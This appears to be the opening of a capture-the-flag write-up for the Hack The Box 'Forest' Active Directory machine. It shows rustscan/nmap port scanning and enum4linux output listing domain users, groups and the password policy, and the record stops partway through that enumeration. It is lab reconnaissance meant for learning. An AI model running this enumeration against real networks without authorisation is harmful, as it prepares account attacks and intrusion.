π Table of Contents
$ sudo rustscan -b 8192 -u 16384 -a 10.10.10.161 -- -sS -sV -sC -oN 10.10.10.161.$(basename $PWD).nmap.txt
# Nmap 7.92 scan initiated Thu Dec 16 12:29:35 2021 as: nmap -vvv -p 53,88,135,139,389,445,464,593,3268,3269,5985,9389,47001,49664,49666,49667,49665,49671,49677,49676,49684,49706 -sS -sV -sC -oN 10.10.10.161.forest.nmap.txt 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up, received echo-reply ttl 127 (0.079s latency).
Scanned at 2021-12-16 12:29:35 PST for 68s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-12-16 20:43:02Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49706/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2021-12-16T20:43:56
|_ start_date: 2021-12-16T20:41:24
|_clock-skew: mean: 2h53m20s, deviation: 4h37m08s, median: 13m20s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021-12-16T12:43:53-08:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 63427/tcp): CLEAN (Couldn't connect)
| Check 2 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 3 (port 21004/udp): CLEAN (Timeout)
| Check 4 (port 44587/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Thu Dec 16 12:30:43 2021 -- 1 IP address (1 host up) scanned in 68.37 seconds
Based on the output from the nmap scan it looks like we've got a Windows computer. Port 88 is Kerberos and is usually a bit of a giveaway that it is an Active Directory computer.
From here we should enumerate further to gather more information to increase our P.E.N.I.S.(Pentest Engagement and Necessary Investigation Score) size. We extracted a list of usernames using enum4linux and enum4linux-ng.
$ enum4linux 10.10.10.161 | tee 10.10.10.161.$(basename $PWD).enum4linux.txt
$ ~/repos/enum4linux-ng.py 10.10.10.161 | tee 10.10.10.161.$(basename $PWD).enum4linux-ng.txt
Starting enum4linux v0.8.9 ( <http://labs.portcullis.co.uk/application/enum4linux/> ) on Thu Dec 16 12:56:41 2021
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.10.161 |
====================================================
[E] Can't find workgroup/domain
============================================
| Nbtstat Information for 10.10.10.161 |
============================================
Looking up status of 10.10.10.161
No reply from 10.10.10.161
=====================================
| Session Check on 10.10.10.161 |
=====================================
[+] Server 10.10.10.161 allows sessions using username '', password ''
[+] Got domain/workgroup name:
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
======================================
| OS information on 10.10.10.161 |
======================================
[+] Got OS info for 10.10.10.161 from smbclient:
[+] Got OS info for 10.10.10.161 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=============================
| Users on 10.10.10.161 |
=============================
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
=========================================
| Share Enumeration on 10.10.10.161 |
=========================================
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.161
====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.161)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
==============================
| Groups on 10.10.10.161 |
==============================
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
[+] Getting builtin group memberships:
Group 'Administrators' (RID: 544) has member: Could not connect to server 10.10.10.161
Group 'Administrators' (RID: 544) has member: The username or password was not correct.
Group 'Administrators' (RID: 544) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Account Operators' (RID: 548) has member: Could not connect to server 10.10.10.161
Group 'Account Operators' (RID: 548) has member: The username or password was not correct.
Group 'Account Operators' (RID: 548) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Distributed COM Users' (RID: 562) has member: Could not connect to server 10.10.10.161
Group 'Distributed COM Users' (RID: 562) has member: The username or password was not correct.
Group 'Distributed COM Users' (RID: 562) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Windows Authorization Access Group' (RID: 560) has member: Could not connect to server 10.10.10.161
Group 'Windows Authorization Access Group' (RID: 560) has member: The username or password was not correct.
Group 'Windows Authorization Access Group' (RID: 560) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Access Control Assistance Operators' (RID: 579) has member: Could not connect to server 10.10.10.161
Group 'Access Control Assistance Operators' (RID: 579) has member: The username or password was not correct.
Group 'Access Control Assistance Operators' (RID: 579) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'RDS Remote Access Servers' (RID: 575) has member: Could not connect to server 10.10.10.161
Group 'RDS Remote Access Servers' (RID: 575) has member: The username or password was not correct.
Group 'RDS Remote Access Servers' (RID: 575) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Hyper-V Administrators' (RID: 578) has member: Could not connect to server 10.10.10.161
Group 'Hyper-V Administrators' (RID: 578) has member: The username or password was not correct.
Group 'Hyper-V Administrators' (RID: 578) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Incoming Forest Trust Builders' (RID: 557) has member: Could not connect to server 10.10.10.161
Group 'Incoming Forest Trust Builders' (RID: 557) has member: The username or password was not correct.
Group 'Incoming Forest Trust Builders' (RID: 557) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Could not connect to server 10.10.10.161
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: The username or password was not correct.
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Network Configuration Operators' (RID: 556) has member: Could not connect to server 10.10.10.161
Group 'Network Configuration Operators' (RID: 556) has member: The username or password was not correct.
Group 'Network Configuration Operators' (RID: 556) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Event Log Readers' (RID: 573) has member: Could not connect to server 10.10.10.161
Group 'Event Log Readers' (RID: 573) has member: The username or password was not correct.
Group 'Event Log Readers' (RID: 573) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Remote Desktop Users' (RID: 555) has member: Could not connect to server 10.10.10.161
Group 'Remote Desktop Users' (RID: 555) has member: The username or password was not correct.
Group 'Remote Desktop Users' (RID: 555) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Replicator' (RID: 552) has member: Could not connect to server 10.10.10.161
Group 'Replicator' (RID: 552) has member: The username or password was not correct.
Group 'Replicator' (RID: 552) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Server Operators' (RID: 549) has member: Could not connect to server 10.10.10.161
Group 'Server Operators' (RID: 549) has member: The username or password was not correct.
Group 'Server Operators' (RID: 549) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'System Managed Accounts Group' (RID: 581) has member: Could not connect to server 10.10.10.161
Group 'System Managed Accounts Group' (RID: 581) has member: The username or password was not correct.
Group 'System Managed Accounts Group' (RID: 581) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Users' (RID: 545) has member: Could not connect to server 10.10.10.161
Group 'Users' (RID: 545) has member: The username or password was not correct.
Group 'Users' (RID: 545) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Cryptographic Operators' (RID: 569) has member: Could not connect to server 10.10.10.161
Group 'Cryptographic Operators' (RID: 569) has member: The username or password was not correct.
Group 'Cryptographic Operators' (RID: 569) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Certificate Service DCOM Access' (RID: 574) has member: Could not connect to server 10.10.10.161
Group 'Certificate Service DCOM Access' (RID: 574) has member: The username or password was not correct.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'RDS Management Servers' (RID: 577) has member: Could not connect to server 10.10.10.161
Group 'RDS Management Servers' (RID: 577) has member: The username or password was not correct.
Group 'RDS Management Servers' (RID: 577) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'RDS Endpoint Servers' (RID: 576) has member: Could not connect to server 10.10.10.161
Group 'RDS Endpoint Servers' (RID: 576) has member: The username or password was not correct.
Group 'RDS Endpoint Servers' (RID: 576) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Terminal Server License Servers' (RID: 561) has member: Could not connect to server 10.10.10.161
Group 'Terminal Server License Servers' (RID: 561) has member: The username or password was not correct.
Group 'Terminal Server License Servers' (RID: 561) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Backup Operators' (RID: 551) has member: Could not connect to server 10.10.10.161
Group 'Backup Operators' (RID: 551) has member: The username or password was not correct.
Group 'Backup Operators' (RID: 551) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Remote Management Users' (RID: 580) has member: Could not connect to server 10.10.10.161
Group 'Remote Management Users' (RID: 580) has member: The username or password was not correct.
Group 'Remote Management Users' (RID: 580) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Performance Log Users' (RID: 559) has member: Could not connect to server 10.10.10.161
Group 'Performance Log Users' (RID: 559) has member: The username or password was not correct.
Group 'Performance Log Users' (RID: 559) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Storage Replica Administrators' (RID: 582) has member: Could not connect to server 10.10.10.161
Group 'Storage Replica Administrators' (RID: 582) has member: The username or password was not correct.
Group 'Storage Replica Administrators' (RID: 582) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Performance Monitor Users' (RID: 558) has member: Could not connect to server 10.10.10.161
Group 'Performance Monitor Users' (RID: 558) has member: The username or password was not correct.
Group 'Performance Monitor Users' (RID: 558) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Print Operators' (RID: 550) has member: Could not connect to server 10.10.10.161
Group 'Print Operators' (RID: 550) has member: The username or password was not correct.
Group 'Print Operators' (RID: 550) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'IIS_IUSRS' (RID: 568) has member: Could not connect to server 10.10.10.161
Group 'IIS_IUSRS' (RID: 568) has member: The username or password was not correct.
Group 'IIS_IUSRS' (RID: 568) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Guests' (RID: 546) has member: Could not connect to server 10.10.10.161
Group 'Guests' (RID: 546) has member: The username or password was not correct.
Group 'Guests' (RID: 546) has member: Connection failed: NT_STATUS_LOGON_FAILURE
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group 'DnsAdmins' (RID: 1101) has member: Could not connect to server 10.10.10.161
Group 'DnsAdmins' (RID: 1101) has member: The username or password was not correct.
Group 'DnsAdmins' (RID: 1101) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Could not connect to server 10.10.10.161
Group 'Denied RODC Password Replication Group' (RID: 572) has member: The username or password was not correct.
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Allowed RODC Password Replication Group' (RID: 571) has member: Could not connect to server 10.10.10.161
Group 'Allowed RODC Password Replication Group' (RID: 571) has member: The username or password was not correct.
Group 'Allowed RODC Password Replication Group' (RID: 571) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Cert Publishers' (RID: 517) has member: Could not connect to server 10.10.10.161
Group 'Cert Publishers' (RID: 517) has member: The username or password was not correct.
Group 'Cert Publishers' (RID: 517) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'RAS and IAS Servers' (RID: 553) has member: Could not connect to server 10.10.10.161
Group 'RAS and IAS Servers' (RID: 553) has member: The username or password was not correct.
Group 'RAS and IAS Servers' (RID: 553) has member: Connection failed: NT_STATUS_LOGON_FAILURE
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Recipient Management' (RID: 1105) has member: Could not connect to server 10.10.10.161
Group 'Recipient Management' (RID: 1105) has member: The username or password was not correct.
Group 'Recipient Management' (RID: 1105) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: Could not connect to server 10.10.10.161
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: The username or password was not correct.
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'UM Management' (RID: 1108) has member: Could not connect to server 10.10.10.161
Group 'UM Management' (RID: 1108) has member: The username or password was not correct.
Group 'UM Management' (RID: 1108) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'ExchangeLegacyInterop' (RID: 1122) has member: Could not connect to server 10.10.10.161
Group 'ExchangeLegacyInterop' (RID: 1122) has member: The username or password was not correct.
Group 'ExchangeLegacyInterop' (RID: 1122) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Group Policy Creator Owners' (RID: 520) has member: Could not connect to server 10.10.10.161
Group 'Group Policy Creator Owners' (RID: 520) has member: The username or password was not correct.
Group 'Group Policy Creator Owners' (RID: 520) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Admins' (RID: 512) has member: Could not connect to server 10.10.10.161
Group 'Domain Admins' (RID: 512) has member: The username or password was not correct.
Group 'Domain Admins' (RID: 512) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Privileged IT Accounts' (RID: 1149) has member: Could not connect to server 10.10.10.161
Group 'Privileged IT Accounts' (RID: 1149) has member: The username or password was not correct.
Group 'Privileged IT Accounts' (RID: 1149) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Exchange Windows Permissions' (RID: 1121) has member: Could not connect to server 10.10.10.161
Group 'Exchange Windows Permissions' (RID: 1121) has member: The username or password was not correct.
Group 'Exchange Windows Permissions' (RID: 1121) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Security Reader' (RID: 1116) has member: Could not connect to server 10.10.10.161
Group 'Security Reader' (RID: 1116) has member: The username or password was not correct.
Group 'Security Reader' (RID: 1116) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Key Admins' (RID: 526) has member: Could not connect to server 10.10.10.161
Group 'Key Admins' (RID: 526) has member: The username or password was not correct.
Group 'Key Admins' (RID: 526) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Organization Management' (RID: 1104) has member: Could not connect to server 10.10.10.161
Group 'Organization Management' (RID: 1104) has member: The username or password was not correct.
Group 'Organization Management' (RID: 1104) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Exchange Servers' (RID: 1118) has member: Could not connect to server 10.10.10.161
Group 'Exchange Servers' (RID: 1118) has member: The username or password was not correct.
Group 'Exchange Servers' (RID: 1118) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Users' (RID: 513) has member: Could not connect to server 10.10.10.161
Group 'Domain Users' (RID: 513) has member: The username or password was not correct.
Group 'Domain Users' (RID: 513) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'test' (RID: 5101) has member: Could not connect to server 10.10.10.161
Group 'test' (RID: 5101) has member: The username or password was not correct.
Group 'test' (RID: 5101) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Discovery Management' (RID: 1111) has member: Could not connect to server 10.10.10.161
Group 'Discovery Management' (RID: 1111) has member: The username or password was not correct.
Group 'Discovery Management' (RID: 1111) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'DnsUpdateProxy' (RID: 1102) has member: Could not connect to server 10.10.10.161
Group 'DnsUpdateProxy' (RID: 1102) has member: The username or password was not correct.
Group 'DnsUpdateProxy' (RID: 1102) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: Could not connect to server 10.10.10.161
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: The username or password was not correct.
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Computers' (RID: 515) has member: Could not connect to server 10.10.10.161
Group 'Domain Computers' (RID: 515) has member: The username or password was not correct.
Group 'Domain Computers' (RID: 515) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Compliance Management' (RID: 1115) has member: Could not connect to server 10.10.10.161
Group 'Compliance Management' (RID: 1115) has member: The username or password was not correct.
Group 'Compliance Management' (RID: 1115) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'View-Only Organization Management' (RID: 1106) has member: Could not connect to server 10.10.10.161
Group 'View-Only Organization Management' (RID: 1106) has member: The username or password was not correct.
Group 'View-Only Organization Management' (RID: 1106) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Read-only Domain Controllers' (RID: 521) has member: Could not connect to server 10.10.10.161
Group 'Read-only Domain Controllers' (RID: 521) has member: The username or password was not correct.
Group 'Read-only Domain Controllers' (RID: 521) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Protected Users' (RID: 525) has member: Could not connect to server 10.10.10.161
Group 'Protected Users' (RID: 525) has member: The username or password was not correct.
Group 'Protected Users' (RID: 525) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Enterprise Read-only Domain Controllers' (RID: 498) has member: Could not connect to server 10.10.10.161
Group 'Enterprise Read-only Domain Controllers' (RID: 498) has member: The username or password was not correct.
Group 'Enterprise Read-only Domain Controllers' (RID: 498) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Server Management' (RID: 1112) has member: Could not connect to server 10.10.10.161
Group 'Server Management' (RID: 1112) has member: The username or password was not correct.
Group 'Server Management' (RID: 1112) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Controllers' (RID: 516) has member: Could not connect to server 10.10.10.161
Group 'Domain Controllers' (RID: 516) has member: The username or password was not correct.
Group 'Domain Controllers' (RID: 516) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Help Desk' (RID: 1109) has member: Could not connect to server 10.10.10.161
Group 'Help Desk' (RID: 1109) has member: The username or password was not correct.
Group 'Help Desk' (RID: 1109) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Delegated Setup' (RID: 1113) has member: Could not connect to server 10.10.10.161
Group 'Delegated Setup' (RID: 1113) has member: The username or password was not correct.
